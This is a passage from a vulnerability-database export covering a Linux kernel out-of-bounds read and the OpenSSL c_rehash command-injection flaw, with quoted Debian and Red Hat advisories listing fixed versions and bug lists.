"url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.4.0-1048.52"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws-5.4/5.4.0-1051.53~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure/5.4.0-1051.53"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1018.19"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.4.0-1038.41"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gke-5.4/5.4.0-1046.48~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gkeop-5.4/5.4.0-1018.19~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-hwe-5.4/5.4.0-77.86~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi-5.4/5.4.0-1038.41~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux/5.4.0-77.86"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws/5.4.0-1051.53"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp-5.4/5.4.0-1046.49~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure-5.4/5.4.0-1051.53~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oracle-5.4/5.4.0-1048.52~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gke/5.4.0-1046.48"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5000-2"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.4.0-1041.42"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.11.0-1009.9"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-4997-2"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.11.0-1010.10"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws/5.11.0-1011.11"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.11.0-1012.13"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.11.0-1011.12"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure/5.11.0-1009.9"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux/5.11.0-22.23"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-hwe-5.8/5.8.0-63.71~20.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws/5.8.0-1041.43"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.8.0-1038.40"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5016-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws-5.8/5.8.0-1041.43~20.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux/5.8.0-63.71"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33909"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oracle-5.8/5.8.0-1037.38~20.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure/5.8.0-1039.42"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.8.0-1032.35"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.8.0-1037.38"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure-5.8/5.8.0-1039.42~20.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.8.0-1033.36"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp-5.8/5.8.0-1038.40~20.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure-4.15/4.15.0-1134.147"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1123.132"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp-4.15/4.15.0-1119.133"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-44733"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-dell300x/4.15.0-1038.43"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-43976"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux/4.15.0-173.182"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1124.133"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5339-1"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0435"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-45095"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1090.99"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1110.113"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0492"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-391284"
},
{
"db": "VULMON",
"id": "CVE-2021-3506"
},
{
"db": "PACKETSTORM",
"id": "166417"
},
{
"db": "PACKETSTORM",
"id": "163253"
},
{
"db": "PACKETSTORM",
"id": "163291"
},
{
"db": "PACKETSTORM",
"id": "163301"
},
{
"db": "PACKETSTORM",
"id": "163249"
},
{
"db": "PACKETSTORM",
"id": "163597"
},
{
"db": "PACKETSTORM",
"id": "166400"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-1357"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-005924"
},
{
"db": "NVD",
"id": "CVE-2021-3506"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-391284",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2021-3506",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166417",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163253",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163291",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163301",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163249",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163597",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166400",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202104-1357",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2021-005924",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2021-3506",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2021-04-19T00:00:00",
"db": "VULHUB",
"id": "VHN-391284",
"ident": null
},
{
"date": "2021-04-19T00:00:00",
"db": "VULMON",
"id": "CVE-2021-3506",
"ident": null
},
{
"date": "2022-03-23T16:02:30",
"db": "PACKETSTORM",
"id": "166417",
"ident": null
},
{
"date": "2021-06-23T15:38:23",
"db": "PACKETSTORM",
"id": "163253",
"ident": null
},
{
"date": "2021-06-27T12:22:22",
"db": "PACKETSTORM",
"id": "163291",
"ident": null
},
{
"date": "2021-06-28T16:22:26",
"db": "PACKETSTORM",
"id": "163301",
"ident": null
},
{
"date": "2021-06-23T15:33:13",
"db": "PACKETSTORM",
"id": "163249",
"ident": null
},
{
"date": "2021-07-21T16:04:29",
"db": "PACKETSTORM",
"id": "163597",
"ident": null
},
{
"date": "2022-03-22T15:35:42",
"db": "PACKETSTORM",
"id": "166400",
"ident": null
},
{
"date": "2021-04-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-1357",
"ident": null
},
{
"date": "2021-12-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-005924",
"ident": null
},
{
"date": "2021-04-19T22:15:13.110000",
"db": "NVD",
"id": "CVE-2021-3506",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2022-01-21T00:00:00",
"db": "VULHUB",
"id": "VHN-391284",
"ident": null
},
{
"date": "2021-05-08T00:00:00",
"db": "VULMON",
"id": "CVE-2021-3506",
"ident": null
},
{
"date": "2022-03-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-1357",
"ident": null
},
{
"date": "2024-11-19T02:38:00",
"db": "JVNDB",
"id": "JVNDB-2021-005924",
"ident": null
},
{
"date": "2024-11-21T06:21:42.427000",
"db": "NVD",
"id": "CVE-2021-3506",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "local",
"sources": [
{
"db": "PACKETSTORM",
"id": "166417"
},
{
"db": "PACKETSTORM",
"id": "163253"
},
{
"db": "PACKETSTORM",
"id": "163291"
},
{
"db": "PACKETSTORM",
"id": "163301"
},
{
"db": "PACKETSTORM",
"id": "163249"
},
{
"db": "PACKETSTORM",
"id": "163597"
},
{
"db": "PACKETSTORM",
"id": "166400"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-1357"
}
],
"trust": 1.3
},
"title": {
"_id": null,
"data": "Linux\u00a0Kernel\u00a0 Out-of-bounds read vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-005924"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202104-1357"
}
],
"trust": 0.6
}
}
VAR-202206-1428
Vulnerability from variot - Updated: 2026-03-09 20:23In addition to the c_rehash shell command injection identified in CVE-2022-1292, further circumstances where the c_rehash script does not properly sanitise shell metacharacters to prevent command injection were found by code review. When the CVE-2022-1292 was fixed it was not discovered that there are other places in the script where the file names of certificates being hashed were possibly passed to a command executed through the shell. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.4 (Affected 3.0.0,3.0.1,3.0.2,3.0.3). Fixed in OpenSSL 1.1.1p (Affected 1.1.1-1.1.1o). Fixed in OpenSSL 1.0.2zf (Affected 1.0.2-1.0.2ze). (CVE-2022-2068). Description:
Red Hat Ceph Storage is a scalable, open, software-defined storage platform that combines the most stable version of the Ceph storage system with a Ceph management platform, deployment utilities, and support services.
Space precludes documenting all of these changes in this advisory. Bugs fixed (https://bugzilla.redhat.com/):
2031228 - CVE-2021-43813 grafana: directory traversal vulnerability 2044628 - CVE-2022-21673 grafana: Forward OAuth Identity Token can allow users to access some data sources 2115198 - build ceph containers for RHCS 5.2 release
For the oldstable distribution (buster), this problem has been fixed in version 1.1.1n-0+deb10u3.
For the stable distribution (bullseye), this problem has been fixed in version 1.1.1n-0+deb11u3.
We recommend that you upgrade your openssl packages.
For the detailed security status of openssl please refer to its security tracker page at: https://security-tracker.debian.org/tracker/openssl
Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----
iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmK4pF0ACgkQEMKTtsN8 TjYP5g//SyfB1W/vUNmgeSp2kKu3vt9CPwoXMK8nhTcA7iYhkxIJTFxAWDpn+4S7 W4kYyxMRFSIHKv4FLiLgi/Vzn4g1kB1UvKv05CFhEJqpWMyyRj6FdmebLlkLG0eE IGsZoQl9be+lRJ+E4oMMkrRkbJV5II7s69vdxFDh4893Ndx05GWWvXT5Doc5gFMi NoNabBH47GFU6aGDwVJU+xooBT6s4QMOrgVKYbxhM5PO98HQzk0zv0Z6YRx7FzKD hYMN/t6A8qj4zMQqJqM+44q9zpDryyolGLewvgOit1HFFnLlBf4wsdBvE7AGhvGs Lam5OXLhlwlQT6gBNd4XFAShdEZGLVF2DCgKzMh5cG5r2W10ewfHHyOR4CnkMQQP ePA8YvhVwSH3I5jOTS75A18LXpoRJKRXQuQ7v9di2C8qRZ0qnM95h0KzH9/UKyUc TmF09MTKWoFCkCtyzucdPnoyUPhdScJc08jcGJ37MCb8uKI4F5jVImLnHC6qS6Oc Gab3OPIDzS8I1rro0J1k8RJE1E8XvfCxgVAOoebn0mst8qT+38hqsTFykG+uq3dN sfhwI+E8iOeVOapyDVzxz8DfIkyBdnFsM4cg9VxDPOOllN+BknySqvzxu+aYpMFz K/D6g421XIIXPXD+sP/w1ENPV7LFobRR7KXUWvjS5l/Ir8dhPdQ= =tiWq -----END PGP SIGNATURE----- .
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Description:
Logging Subsystem 5.5.0 - Red Hat OpenShift
Security Fix(es):
-
kubeclient: kubeconfig parsing error can lead to MITM attacks (CVE-2022-0759)
-
golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)
-
golang: out-of-bounds read in golang.org/x/text/language leads to DoS (CVE-2021-38561)
-
prometheus/client_golang: Denial of service using InstrumentHandlerCounter (CVE-2022-21698)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
2045880 - CVE-2022-21698 prometheus/client_golang: Denial of service using InstrumentHandlerCounter 2058404 - CVE-2022-0759 kubeclient: kubeconfig parsing error can lead to MITM attacks 2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS 2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read
- JIRA issues fixed (https://issues.jboss.org/):
LOG-1415 - Allow users to tune fluentd
LOG-1539 - Events and CLO csv are not collected after running oc adm must-gather --image=$downstream-clo-image
LOG-1713 - Reduce Permissions granted for prometheus-k8s service account
LOG-2063 - Collector pods fail to start when a Vector only Cluster Logging instance is created.
LOG-2134 - The infra logs are sent to app-xx indices
LOG-2159 - Cluster Logging Pods in CrashLoopBackOff
LOG-2165 - [Vector] Default log level debug makes it hard to find useful error/failure messages.
LOG-2167 - [Vector] Collector pods fails to start with configuration error when using Kafka SASL over SSL
LOG-2169 - [Vector] Logs not being sent to Kafka with SASL plaintext.
LOG-2172 - [vector]The openshift-apiserver and ovn audit logs can not be collected.
LOG-2242 - Log file metric exporter is still following /var/log/containers files.
LOG-2243 - grafana-dashboard-cluster-logging should be deleted once clusterlogging/instance was removed
LOG-2264 - Logging link should contain an icon
LOG-2274 - [Logging 5.5] EO doesn't recreate secrets kibana and kibana-proxy after removing them.
LOG-2276 - Fluent config format is hard to read via configmap
LOG-2290 - ClusterLogging Instance status in not getting updated in UI
LOG-2291 - [release-5.5] Events listing out of order in Kibana 6.8.1
LOG-2294 - [Vector] Vector internal metrics are not exposed via HTTPS due to which OpenShift Monitoring Prometheus service cannot scrape the metrics endpoint.
LOG-2300 - [Logging 5.5]ES pods can't be ready after removing secret/signing-elasticsearch
LOG-2303 - [Logging 5.5] Elasticsearch cluster upgrade stuck
LOG-2308 - configmap grafana-dashboard-elasticsearch is being created and deleted continously
LOG-2333 - Journal logs not reaching Elasticsearch output
LOG-2337 - [Vector] Missing @ prefix from the timestamp field in log record.
LOG-2342 - [Logging 5.5] Kibana pod can't connect to ES cluster after removing secret/signing-elasticsearch: "x509: certificate signed by unknown authority"
LOG-2384 - Provide a method to get authenticated from GCP
LOG-2411 - [Vector] Audit logs forwarding not working.
LOG-2412 - CLO's loki output url is parsed wrongly
LOG-2413 - PriorityClass cluster-logging is deleted if provide an invalid log type
LOG-2418 - EO supported time units don't match the units specified in CRDs.
LOG-2439 - Telemetry: the managedStatus&healthStatus&version values are wrong
LOG-2440 - [loki-operator] Live tail of logs does not work on OpenShift
LOG-2444 - The write index is removed when the size of the index > diskThresholdPercent% * total size.
LOG-2460 - [Vector] Collector pods fail to start on a FIPS enabled cluster.
LOG-2461 - [Vector] Vector auth config not generated when user provided bearer token is used in a secret for connecting to LokiStack.
LOG-2463 - Elasticsearch operator repeatedly prints error message when checking indices
LOG-2474 - EO shouldn't grant cluster-wide permission to system:serviceaccount:openshift-monitoring:prometheus-k8s when ES cluster is deployed. [openshift-logging 5.5]
LOG-2522 - CLO supported time units don't match the units specified in CRDs.
LOG-2525 - The container's logs are not sent to separate index if the annotation is added after the pod is ready.
LOG-2546 - TLS handshake error on loki-gateway for FIPS cluster
LOG-2549 - [Vector] [master] Journald logs not sent to the Log store when using Vector as collector.
LOG-2554 - [Vector] [master] Fallback index is not used when structuredTypeKey is missing from JSON log data
LOG-2588 - FluentdQueueLengthIncreasing rule failing to be evaluated.
LOG-2596 - [vector]the condition in [transforms.route_container_logs] is inaccurate
LOG-2599 - Supported values for level field don't match documentation
LOG-2605 - $labels.instance is empty in the message when firing FluentdNodeDown alert
LOG-2609 - fluentd and vector are unable to ship logs to elasticsearch when cluster-wide proxy is in effect
LOG-2619 - containers violate PodSecurity -- Log Exporation
LOG-2627 - containers violate PodSecurity -- Loki
LOG-2649 - Level Critical should match the beginning of the line as the other levels
LOG-2656 - Logging uses deprecated v1beta1 apis
LOG-2664 - Deprecated Feature logs causing too much noise
LOG-2665 - [Logging 5.5] Sometimes collector fails to push logs to Elasticsearch cluster
LOG-2693 - Integration with Jaeger fails for ServiceMonitor
LOG-2700 - [Vector] vector container can't start due to "unknown field pod_annotation_fields" .
LOG-2703 - Collector DaemonSet is not removed when CLF is deleted for fluentd/vector only CL instance
LOG-2725 - Upgrade logging-eventrouter Golang version and tags
LOG-2731 - CLO keeps reporting Reconcile ServiceMonitor retry error and Reconcile Service retry error after creating clusterlogging.
LOG-2732 - Prometheus Operator pod throws 'skipping servicemonitor' error on Jaeger integration
LOG-2742 - unrecognized outputs when use the sts role secret
LOG-2746 - CloudWatch forwarding rejecting large log events, fills tmpfs
LOG-2749 - OpenShift Logging Dashboard for Elastic Shards shows "active_primary" instead of "active" shards.
LOG-2753 - Update Grafana configuration for LokiStack integration on grafana/loki repo
LOG-2763 - [Vector]{Master} Vector's healthcheck fails when forwarding logs to Lokistack.
LOG-2764 - ElasticSearch operator does not respect referencePolicy when selecting oauth-proxy image
LOG-2765 - ingester pod can not be started in IPv6 cluster
LOG-2766 - [vector] failed to parse cluster url: invalid authority IPv6 http-proxy
LOG-2772 - arn validation failed when role_arn=arn:aws-us-gov:xxx
LOG-2773 - No cluster-logging-operator-metrics service in logging 5.5
LOG-2778 - [Vector] [OCP 4.11] SA token not added to Vector config when connecting to LokiStack instance without CLF creds secret required by LokiStack.
LOG-2784 - Japanese log messages are garbled at Kibana
LOG-2793 - [Vector] OVN audit logs are missing the level field.
LOG-2864 - [vector] Can not sent logs to default when loki is the default output in CLF
LOG-2867 - [fluentd] All logs are sent to application tenant when loki is used as default logstore in CLF.
LOG-2873 - [Vector] Cannot configure CPU/Memory requests/limits when using Vector as collector.
LOG-2875 - Seeing a black rectangle box on the graph in Logs view
LOG-2876 - The link to the 'Container details' page on the 'Logs' screen throws error
LOG-2877 - When there is no query entered, seeing error message on the Logs view
LOG-2882 - RefreshIntervalDropdown and TimeRangeDropdown always set back to its original values when switching between pages in 'Logs' screen
- References:
https://access.redhat.com/security/cve/CVE-2021-38561 https://access.redhat.com/security/cve/CVE-2022-0759 https://access.redhat.com/security/cve/CVE-2022-1012 https://access.redhat.com/security/cve/CVE-2022-1292 https://access.redhat.com/security/cve/CVE-2022-1586 https://access.redhat.com/security/cve/CVE-2022-1785 https://access.redhat.com/security/cve/CVE-2022-1897 https://access.redhat.com/security/cve/CVE-2022-1927 https://access.redhat.com/security/cve/CVE-2022-2068 https://access.redhat.com/security/cve/CVE-2022-2097 https://access.redhat.com/security/cve/CVE-2022-21698 https://access.redhat.com/security/cve/CVE-2022-30631 https://access.redhat.com/security/cve/CVE-2022-32250 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc. Summary:
Red Hat OpenShift Virtualization release 4.12 is now available with updates to packages and images that fix several bugs and add enhancements. Description:
OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform.
RHEL-8-CNV-4.12
============= bridge-marker-container-v4.12.0-24 cluster-network-addons-operator-container-v4.12.0-24 cnv-containernetworking-plugins-container-v4.12.0-24 cnv-must-gather-container-v4.12.0-58 hco-bundle-registry-container-v4.12.0-769 hostpath-csi-driver-container-v4.12.0-30 hostpath-provisioner-container-v4.12.0-30 hostpath-provisioner-operator-container-v4.12.0-31 hyperconverged-cluster-operator-container-v4.12.0-96 hyperconverged-cluster-webhook-container-v4.12.0-96 kubemacpool-container-v4.12.0-24 kubevirt-console-plugin-container-v4.12.0-182 kubevirt-ssp-operator-container-v4.12.0-64 kubevirt-tekton-tasks-cleanup-vm-container-v4.12.0-55 kubevirt-tekton-tasks-copy-template-container-v4.12.0-55 kubevirt-tekton-tasks-create-datavolume-container-v4.12.0-55 kubevirt-tekton-tasks-create-vm-from-template-container-v4.12.0-55 kubevirt-tekton-tasks-disk-virt-customize-container-v4.12.0-55 kubevirt-tekton-tasks-disk-virt-sysprep-container-v4.12.0-55 kubevirt-tekton-tasks-modify-vm-template-container-v4.12.0-55 kubevirt-tekton-tasks-operator-container-v4.12.0-40 kubevirt-tekton-tasks-wait-for-vmi-status-container-v4.12.0-55 kubevirt-template-validator-container-v4.12.0-32 libguestfs-tools-container-v4.12.0-255 ovs-cni-marker-container-v4.12.0-24 ovs-cni-plugin-container-v4.12.0-24 virt-api-container-v4.12.0-255 virt-artifacts-server-container-v4.12.0-255 virt-cdi-apiserver-container-v4.12.0-72 virt-cdi-cloner-container-v4.12.0-72 virt-cdi-controller-container-v4.12.0-72 virt-cdi-importer-container-v4.12.0-72 virt-cdi-operator-container-v4.12.0-72 virt-cdi-uploadproxy-container-v4.12.0-71 virt-cdi-uploadserver-container-v4.12.0-72 virt-controller-container-v4.12.0-255 virt-exportproxy-container-v4.12.0-255 virt-exportserver-container-v4.12.0-255 virt-handler-container-v4.12.0-255 virt-launcher-container-v4.12.0-255 virt-operator-container-v4.12.0-255 virtio-win-container-v4.12.0-10 vm-network-latency-checkup-container-v4.12.0-89
- Bugs fixed (https://bugzilla.redhat.com/):
1719190 - Unable to cancel live-migration if virt-launcher pod in pending state
2023393 - [CNV] [UI]Additional information needed for cloning when default storageclass in not defined in target datavolume
2030801 - CVE-2021-44716 golang: net/http: limit growth of header canonicalization cache
2030806 - CVE-2021-44717 golang: syscall: don't close fd 0 on ForkExec error
2040377 - Unable to delete failed VMIM after VM deleted
2046298 - mdevs not configured with drivers installed, if mdev config added to HCO CR before drivers are installed
2052556 - Metric "kubevirt_num_virt_handlers_by_node_running_virt_launcher" reporting incorrect value
2053429 - CVE-2022-23806 golang: crypto/elliptic: IsOnCurve returns true for invalid field elements
2053532 - CVE-2022-23772 golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString
2053541 - CVE-2022-23773 golang: cmd/go: misinterpretation of branch names can lead to incorrect access control
2060499 - [RFE] Cannot add additional service (or other objects) to VM template
2069098 - Large scale |VMs migration is slow due to low migration parallelism
2070366 - VM Snapshot Restore hangs indefinitely when backed by a snapshotclass
2071491 - Storage Throughput metrics are incorrect in Overview
2072797 - Metrics in Virtualization -> Overview period is not clear or configurable
2072821 - Top Consumers of Storage Traffic in Kubevirt Dashboard giving unexpected numbers
2079916 - KubeVirt CR seems to be in DeploymentInProgress state and not recovering
2084085 - CVE-2022-29526 golang: syscall: faccessat checks wrong group
2086285 - [dark mode] VirtualMachine - in the Utilization card the percentages and the graphs not visible enough in dark mode
2086551 - Min CPU feature found in labels
2087724 - Default template show no boot source even there are auto-upload boot sources
2088129 - [SSP] webhook does not comply with restricted security context
2088464 - [CDI] cdi-deployment does not comply with restricted security context
2089391 - Import gzipped raw file causes image to be downloaded and uncompressed to TMPDIR
2089744 - HCO should label its control plane namespace to admit pods at privileged security level
2089751 - 4.12.0 containers
2089804 - 4.12.0 rpms
2091856 - ?Edit BootSource? action should have more explicit information when disabled
2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add
2092796 - [RFE] CPU|Memory display in the template card is not consistent with the display in the template drawer
2093771 - The disk source should be PVC if the template has no auto-update boot source
2093996 - kubectl get vmi API should always return primary interface if exist
2094202 - Cloud-init username field should have hint
2096285 - KubeVirt CR API documentation is missing docs for many fields
2096780 - [RFE] Add ssh-key and sysprep to template scripts tab
2097436 - Online disk expansion ignores filesystem overhead change
2097586 - AccessMode should stay on ReadWriteOnce while editing a disk with storage class HPP
2099556 - [RFE] Add option to enable RDP service for windows vm
2099573 - [RFE] Improve template's message about not editable
2099923 - [RFE] Merge "SSH access" and "SSH command" into one
2100290 - Error is not dismissed on catalog review page
2100436 - VM list filtering ignores VMs in error-states
2100442 - [RFE] allow enabling and disabling SSH service while VM is shut down
2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS
2100629 - Update nested support KBASE article
2100679 - The number of hardware devices is not correct in vm overview tab
2100682 - All hardware devices get deleted while just delete one
2100684 - Workload profile are not editable during creation and after creation
2101144 - VM filter has two "Other" checkboxes which are triggered together
2101164 - [dark mode] Number of alerts in Alerts card not visible enough in dark mode
2101167 - Edit buttons clickable area is too large.
2101333 - [e2e] elements on Template Scheduling tab are missing proper data-test-id
2101335 - Clone action enabled in VM list kebab button for a VM in CrashLoopBackOff state
2101390 - Easy to miss the "tick" when adding GPU device to vm via UI
2101394 - [e2e] elements on VM Scripts tab are missing proper data-test-id
2101423 - wrong user name on using ignition
2101430 - Using CLOUD_USER_PASSWORD in Templates parameters breaks VM review page
2101445 - "Pending changes - Boot Order"
2101454 - Cannot add PVC boot source to template in 'Edit Boot Source Reference' view as a non-priv user
2101499 - Cannot add NIC to VM template as non-priv user
2101501 - NAME parameter in VM template has no effect.
2101628 - non-priv user cannot load dataSource while edit template's rootdisk
2101667 - VMI view is not aligned with vm and tempates
2101681 - All templates are labeling "source available" in template list page
2102074 - VM Creation time on VM Overview Details card lacks string
2102125 - vm clone modal is displaying DV size instead of PVC size
2102132 - align the utilization card of single VM overview with the design
2102138 - Should the word "new" be removed from "Create new VirtualMachine from catalog"?
2102256 - Add button moved to right
2102448 - VM disk is deleted by uncheck "Delete disks (1x)" on delete modal
2102475 - Template 'vm-template-example' should be filtered by 'Fedora' rather than 'Other'
2102561 - sysprep-info should link to downstream doc
2102737 - Clone a VM should lead to vm overview tab
2102740 - "Save" button on vm clone modal should be "Clone"
2103806 - "404: Not Found" appears shortly by clicking the PVC link on vm disk tab
2103807 - PVC is not named by VM name while creating vm quickly
2103817 - Workload profile values in vm details should align with template's value
2103844 - VM nic model is empty
2104331 - VM list page scroll up automatically
2104402 - VM create button is not enabled while adding multiple environment disks
2104422 - Storage status report "OpenShift Data Foundation is not available" even the operator is installed
2104424 - Enable descheduler or hide it on template's scheduling tab
2104479 - [4.12] Cloned VM's snapshot restore fails if the source VM disk is deleted
2104480 - Alerts in VM overview tab disappeared after a few seconds
2104785 - "Add disk" and "Disks" are on the same line
2104859 - [RFE] Add "Copy SSH command" to VM action list
2105257 - Can't set log verbosity level for virt-operator pod
2106175 - All pages are crashed after visit Virtualization -> Overview
2106963 - Cannot add configmap for windows VM
2107279 - VM Template's bootable disk can be marked as bootable
2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read
2107371 - CVE-2022-30630 golang: io/fs: stack exhaustion in Glob
2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header
2107376 - CVE-2022-1962 golang: go/parser: stack exhaustion in all Parse functions
2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working
2107386 - CVE-2022-30632 golang: path/filepath: stack exhaustion in Glob
2107388 - CVE-2022-30635 golang: encoding/gob: stack exhaustion in Decoder.Decode
2107390 - CVE-2022-28131 golang: encoding/xml: stack exhaustion in Decoder.Skip
2107392 - CVE-2022-30633 golang: encoding/xml: stack exhaustion in Unmarshal
2108339 - datasource does not provide timestamp when updated
2108638 - When chosing a vm or template while in all-namespace, and returning to list, namespace is changed
2109818 - Upstream metrics documentation is not detailed enough
2109975 - DataVolume fails to import "cirros-container-disk-demo" image
2110256 - Storage -> PVC -> upload data, does not support source reference
2110562 - CNV introduces a compliance check fail in "ocp4-moderate" profile - routes-protected-by-tls
2111240 - GiB changes to B in Template's Edit boot source reference modal
2111292 - kubevirt plugin console is crashed after creating a vm with 2 nics
2111328 - kubevirt plugin console crashed after visit vmi page
2111378 - VM SSH command generated by UI points at api VIP
2111744 - Cloned template should not label app.kubernetes.io/name: common-templates
2111794 - the virtlogd process is taking too much RAM! (17468Ki > 17Mi)
2112900 - button style are different
2114516 - Nothing happens after clicking on Fedora cloud image list link
2114636 - The style of displayed items are not unified on VM tabs
2114683 - VM overview tab is crashed just after the vm is created
2115257 - Need to Change system-product-name to "OpenShift Virtualization" in CNV-4.12
